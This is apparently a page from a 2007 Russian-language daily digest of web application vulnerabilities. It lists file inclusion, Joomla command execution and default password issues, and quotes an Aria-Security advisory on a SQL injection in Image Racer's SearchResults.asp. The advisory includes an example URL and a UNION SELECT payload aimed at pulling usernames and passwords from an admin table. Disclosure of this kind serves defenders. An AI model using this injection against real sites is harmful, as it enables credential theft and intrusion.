Дополнительная информация Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl ) Minb Is Not A Blog default password directory Webspell 4.x Local File Inclusion PHMe CMS 0.0.2 local File Include Vulnerabilitiy SEC Consult SA-20070722-0 :: Remote command execution in Joomla! CMS From:Advisory_(at)_Aria-Security.net <Advisory_(at)_Aria-Security.net> Date:23 июля 2007 г.Subject:[Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.__________________ Aria-Security Team __________________ Image Racer SearchResults.asp SQL Injection Vendor: http://www.junctionquest.com/Software.asp Example: http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0 Example : -1 'union select username,password from admin where [FIND IT YOUR SELF]=1 ------------------------------------------------ Credits: Aria-Security Team http://aria-security.net/ Personal Blog: http://outlaw.aria-security.info
Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
Minb Is Not A Blog default password directory
Webspell 4.x Local File Inclusion
PHMe CMS 0.0.2 local File Include Vulnerabilitiy
SEC Consult SA-20070722-0 :: Remote command execution in Joomla! CMS
